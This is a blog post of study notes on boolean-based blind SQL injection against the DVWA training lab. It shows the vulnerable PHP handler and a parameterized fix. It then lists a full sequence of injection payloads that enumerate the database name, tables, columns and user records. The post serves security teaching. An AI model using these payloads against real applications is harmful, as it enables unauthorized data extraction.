Study Notes 14: Manual MySQL Injection, Boolean-Based Blind Injection

1. Principle

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        $html .= '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        $html .= '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>
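The same handler rewritten so that the id value is validated and bound as a query parameter instead of being concatenated into the SQL string. This is an added example, not DVWA's own code; it assumes the same mysqli connection in $GLOBALS["___mysqli_ston"] and the same $html variable as the snippet above.

```php
<?php
// Added example: hardened version of the DVWA handler above (not DVWA's own code).
// Assumes the same mysqli connection in $GLOBALS["___mysqli_ston"] and the same $html.

if (isset($_GET['Submit'])) {
    // Get input
    $id = isset($_GET['id']) ? $_GET['id'] : '';

    // user_id is an integer column, so reject anything that is not a plain
    // decimal string before it gets anywhere near SQL. This alone stops
    // 1' and 1=1 # and 1' and ascii(substr(database(),1,1))>97 #.
    if (!ctype_digit($id)) {
        header($_SERVER['SERVER_PROTOCOL'] . ' 400 Bad Request');
        $html .= '<pre>Invalid user ID.</pre>';
    }
    else {
        $db = $GLOBALS["___mysqli_ston"];

        // Prepared statement: the value is sent separately from the query
        // text, so it can never change the WHERE clause, whatever it contains.
        $stmt = mysqli_prepare($db, 'SELECT first_name, last_name FROM users WHERE user_id = ?');
        if ($stmt === false) {
            // Log server-side only; never echo mysqli_error() to the user.
            error_log('prepare failed: ' . mysqli_error($db));
            header($_SERVER['SERVER_PROTOCOL'] . ' 500 Internal Server Error');
            $html .= '<pre>Lookup failed.</pre>';
        }
        else {
            mysqli_stmt_bind_param($stmt, 'i', $id);
            mysqli_stmt_execute($stmt);
            mysqli_stmt_store_result($stmt);
            $num = mysqli_stmt_num_rows($stmt);
            mysqli_stmt_close($stmt);

            // The found / not-found feedback is kept: once the query is parameterized
            // there is no attacker-controlled condition left for it to answer.
            if ($num > 0) {
                $html .= '<pre>User ID exists in the database.</pre>';
            }
            else {
                header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found');
                $html .= '<pre>User ID is MISSING from the database.</pre>';
            }
        }

        mysqli_close($db);
    }
}
```

The 200/404 difference is only an oracle because the original query lets the attacker inject a condition for it to report on; with the value bound, the same feedback leaks nothing.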

2. Functions commonly used in blind injection

  • length()     returns the length of a string, for example to obtain the length of the database name
  • substr(string,start,length)     extracts a substring; for example, with the string a="abcdefg", substr(a,1,3) yields "bcd" and substr(a,3,1) yields "d"; substr(string,0) means the whole string
  • ascii()       returns the ASCII code of a character
  • sleep(n)    suspends execution for a period of time, where n is the number of seconds
  • if(expr1,expr2,expr3)   conditional expression: if the first expression is true, the second is returned, otherwise the third

3. Injection procedure

1) Determine whether an injection point exists, and whether it is string-based or numeric

1' and 1=1 #

1' and 1=2 #

2) Guess the name of the current database

Guess the length

Enter 1' and length(database())=1 #, the page shows "not found";

Enter 1' and length(database())=2 #, shows "not found";

Enter 1' and length(database())=3 #, shows "not found";

Enter 1' and length(database())=4 #, shows "found"; so the database name is 4 characters long

Binary search, one character at a time

Enter 1' and ascii(substr(database(),1,1))>97 #, shows "found", so the ASCII value of the first character of the database name is greater than 97 (the ASCII value of lowercase a);

Enter 1' and ascii(substr(database(),1,1))<122 #, shows "found", so the ASCII value of the first character of the database name is less than 122 (the ASCII value of lowercase z);

Enter 1' and ascii(substr(database(),1,1))<109 #, shows "found", so the ASCII value of the first character of the database name is less than 109 (the ASCII value of lowercase m);

Enter 1' and ascii(substr(database(),1,1))<103 #, shows "found", so the ASCII value of the first character of the database name is less than 103 (the ASCII value of lowercase g);

Enter 1' and ascii(substr(database(),1,1))<100 #, shows "not found", so the ASCII value of the first character of the database name is not less than 100 (the ASCII value of lowercase d);

Enter 1' and ascii(substr(database(),1,1))>100 #, shows "not found", so the ASCII value of the first character of the database name is not greater than 100 (the ASCII value of lowercase d) either; therefore the ASCII value of the first character is 100, i.e. lowercase d.

……

Repeat the steps above until the complete database name, dvwa, is obtained

输⼊1' and ascii(substr(database(),n,1))>100

……

3) Guess the table names

Guess the number of tables

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 # shows "not found"

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # shows "found"; so the database has 2 tables

Guess the length of the first table name

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # shows "not found"

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # shows "not found"

……

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # shows "found"; so the table name is 9 characters long

To guess the length of the second table name, change limit 0,1 to limit 1,1

Guess the name of the first table

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # shows "found"

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # shows "found"

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # shows "found"

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # shows "not found"

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # shows "not found"

……

Repeat the operations above to obtain the table names guestbook and users

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),n,1))>97 #

4) Guess the column names in the table

Guess the number of columns

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # shows "not found"

……

1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # shows "found"; so the table has 8 columns

Guess the length of the first column name

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # shows "not found"

……

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # shows "found"; so the first column name is 7 characters long

Guess the first column name

1' and ascii(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1))>97 # shows "found"

……

Repeat the operations above

5) Guess the data

Binary search for the data

and ascii(substr((select user from dvwa.users limit 0,1),1,1))>96 #

……

Brute-force guessing

1' and (select count(*) from users where user = 'admin') = 1 #

4. Advantages and disadvantages

The process is tedious. Boolean-based blind injection is used when a UNION query cannot be used, but as long as you keep going you will almost always get the result

posted @ 2021-12-06 15:13  Ling_Chen